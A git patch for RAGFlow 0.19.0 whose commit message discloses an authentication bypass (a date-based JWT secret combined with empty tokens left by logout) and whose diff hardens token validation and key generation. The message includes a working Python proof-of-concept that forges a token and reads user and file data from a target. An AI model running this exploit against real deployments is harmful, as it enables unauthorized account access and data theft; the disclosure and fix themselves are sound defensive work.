From de89b84661eaf7cfc75a9d26fc0a54e1f9a690e2 Mon Sep 17 00:00:00 2001 From: Gecko Security Date: Thu, 5 Jun 2025 05:10:24 +0100 Subject: [PATCH] Fix: Authentication Bypass via predictable JWT secret and empty token validation (#7998) ### Description There's a critical authentication bypass vulnerability that allows remote attackers to gain unauthorized access to user accounts without any credentials. The vulnerability stems from two security flaws: (1) the application uses a predictable `SECRET_KEY` that defaults to the current date, and (2) the authentication mechanism fails to properly validate empty access tokens left by logged-out users. When combined, these flaws allow attackers to forge valid JWT tokens and authenticate as any user who has previously logged out of the system. The authentication flow relies on JWT tokens signed with a `SECRET_KEY` that, in default configurations, is set to `str(date.today())` (e.g., "2025-05-30"). When users log out, their `access_token` field in the database is set to an empty string but their account records remain active. An attacker can exploit this by generating a JWT token that represents an empty access_token using the predictable daily secret, effectively bypassing all authentication controls. ### Source - Sink Analysis **Source (User Input):** HTTP Authorization header containing attacker-controlled JWT token **Flow Path:** 1. **Entry Point:** `load_user()` function in `api/apps/__init__.py` (Line 142) 2. **Token Processing:** JWT token extracted from Authorization header 3. **Secret Key Usage:** Token decoded using predictable SECRET_KEY from `api/settings.py` (Line 123) 4. **Database Query:** `UserService.query()` called with decoded empty access_token 5. **Sink:** Authentication succeeds, returning first user with empty access_token ### Proof of Concept ```python import requests from datetime import date from itsdangerous.url_safe import URLSafeTimedSerializer import sys def exploit_ragflow(target): # Generate token with predictable key daily_key = str(date.today()) serializer = URLSafeTimedSerializer(secret_key=daily_key) malicious_token = serializer.dumps("") print(f"Target: {target}") print(f"Secret key: {daily_key}") print(f"Generated token: {malicious_token}\n") # Test endpoints endpoints = [ ("/v1/user/info", "User profile"), ("/v1/file/list?parent_id=&keywords=&page_size=10&page=1", "File listing") ] auth_headers = {"Authorization": malicious_token} for path, description in endpoints: print(f"Testing {description}...") response = requests.get(f"{target}{path}", headers=auth_headers) if response.status_code == 200: data = response.json() if data.get("code") == 0: print(f"SUCCESS {description} accessible") if "user" in path: user_data = data.get("data", {}) print(f" Email: {user_data.get('email')}") print(f" User ID: {user_data.get('id')}") elif "file" in path: files = data.get("data", {}).get("files", []) print(f" Files found: {len(files)}") else: print(f"Access denied") else: print(f"HTTP {response.status_code}") print() if __name__ == "__main__": target_url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost" exploit_ragflow(target_url) ``` **Exploitation Steps:** 1. Deploy RAGFlow with default configuration 2. Create a user and make at least one user log out (creating empty access_token in database) 3. Run the PoC script against the target 4. Observe successful authentication and data access without any credentials **Version:** 0.19.0 @KevinHuSh @asiroliu @cike8899 Co-authored-by: nkoorty --- api/apps/__init__.py | 13 +++++++++++++ api/apps/user_app.py | 3 ++- api/db/services/user_service.py | 25 +++++++++++++++++++++++++ api/settings.py | 22 +++++++++++++++++++++- 4 files changed, 61 insertions(+), 2 deletions(-) diff --git a/api/apps/__init__.py b/api/apps/__init__.py index 7acef9be5..007e37430 100644 --- a/api/apps/__init__.py +++ b/api/apps/__init__.py @@ -146,10 +146,23 @@ def load_user(web_request): if authorization: try: access_token = str(jwt.loads(authorization)) + + if not access_token or not access_token.strip(): + logging.warning("Authentication attempt with empty access token") + return None + + # Access tokens should be UUIDs (32 hex characters) + if len(access_token.strip()) < 32: + logging.warning(f"Authentication attempt with invalid token format: {len(access_token)} chars") + return None + user = UserService.query( access_token=access_token, status=StatusEnum.VALID.value ) if user: + if not user[0].access_token or not user[0].access_token.strip(): + logging.warning(f"User {user[0].email} has empty access_token in database") + return None return user[0] else: return None diff --git a/api/apps/user_app.py b/api/apps/user_app.py index 597f50971..b8d66ecba 100644 --- a/api/apps/user_app.py +++ b/api/apps/user_app.py @@ -16,6 +16,7 @@ import json import logging import re +import secrets from datetime import datetime from flask import redirect, request, session @@ -465,7 +466,7 @@ def log_out(): schema: type: object """ - current_user.access_token = "" + current_user.access_token = f"INVALID_{secrets.token_hex(16)}" current_user.save() logout_user() return get_json_result(data=True) diff --git a/api/db/services/user_service.py b/api/db/services/user_service.py index 1edd46c10..e8344cb43 100644 --- a/api/db/services/user_service.py +++ b/api/db/services/user_service.py @@ -15,6 +15,7 @@ # import hashlib from datetime import datetime +import logging import peewee from werkzeug.security import generate_password_hash, check_password_hash @@ -39,6 +40,30 @@ class UserService(CommonService): """ model = User + @classmethod + @DB.connection_context() + def query(cls, cols=None, reverse=None, order_by=None, **kwargs): + if 'access_token' in kwargs: + access_token = kwargs['access_token'] + + # Reject empty, None, or whitespace-only access tokens + if not access_token or not str(access_token).strip(): + logging.warning("UserService.query: Rejecting empty access_token query") + return cls.model.select().where(cls.model.id == "INVALID_EMPTY_TOKEN") # Returns empty result + + # Reject tokens that are too short (should be UUID, 32+ chars) + if len(str(access_token).strip()) < 32: + logging.warning(f"UserService.query: Rejecting short access_token query: {len(str(access_token))} chars") + return cls.model.select().where(cls.model.id == "INVALID_SHORT_TOKEN") # Returns empty result + + # Reject tokens that start with "INVALID_" (from logout) + if str(access_token).startswith("INVALID_"): + logging.warning("UserService.query: Rejecting invalidated access_token") + return cls.model.select().where(cls.model.id == "INVALID_LOGOUT_TOKEN") # Returns empty result + + # Call parent query method for valid requests + return super().query(cols=cols, reverse=reverse, order_by=order_by, **kwargs) + @classmethod @DB.connection_context() def filter_by_id(cls, user_id): diff --git a/api/settings.py b/api/settings.py index 2d743f904..22e9d03f4 100644 --- a/api/settings.py +++ b/api/settings.py @@ -15,6 +15,7 @@ # import json import os +import secrets from datetime import date from enum import Enum, IntEnum @@ -73,6 +74,25 @@ SANDBOX_HOST = None BUILTIN_EMBEDDING_MODELS = ["BAAI/bge-large-zh-v1.5@BAAI", "maidalun1020/bce-embedding-base_v1@Youdao"] +def get_or_create_secret_key(): + secret_key = os.environ.get("RAGFLOW_SECRET_KEY") + if secret_key and len(secret_key) >= 32: + return secret_key + + # Check if there's a configured secret key + configured_key = get_base_config(RAG_FLOW_SERVICE_NAME, {}).get("secret_key") + if configured_key and configured_key != str(date.today()) and len(configured_key) >= 32: + return configured_key + + # Generate a new secure key and warn about it + import logging + new_key = secrets.token_hex(32) + logging.warning( + "SECURITY WARNING: Using auto-generated SECRET_KEY. " + f"Generated key: {new_key}" + ) + return new_key + def init_settings(): global LLM, LLM_FACTORY, LLM_BASE_URL, LIGHTEN, DATABASE_TYPE, DATABASE, FACTORY_LLM_INFOS, REGISTER_ENABLED @@ -121,7 +141,7 @@ def init_settings(): HOST_IP = get_base_config(RAG_FLOW_SERVICE_NAME, {}).get("host", "127.0.0.1") HOST_PORT = get_base_config(RAG_FLOW_SERVICE_NAME, {}).get("http_port") - SECRET_KEY = get_base_config(RAG_FLOW_SERVICE_NAME, {}).get("secret_key", str(date.today())) + SECRET_KEY = get_or_create_secret_key() global AUTHENTICATION_CONF, CLIENT_AUTHENTICATION, HTTP_APP_KEY, GITHUB_OAUTH, FEISHU_OAUTH, OAUTH_CONFIG # authentication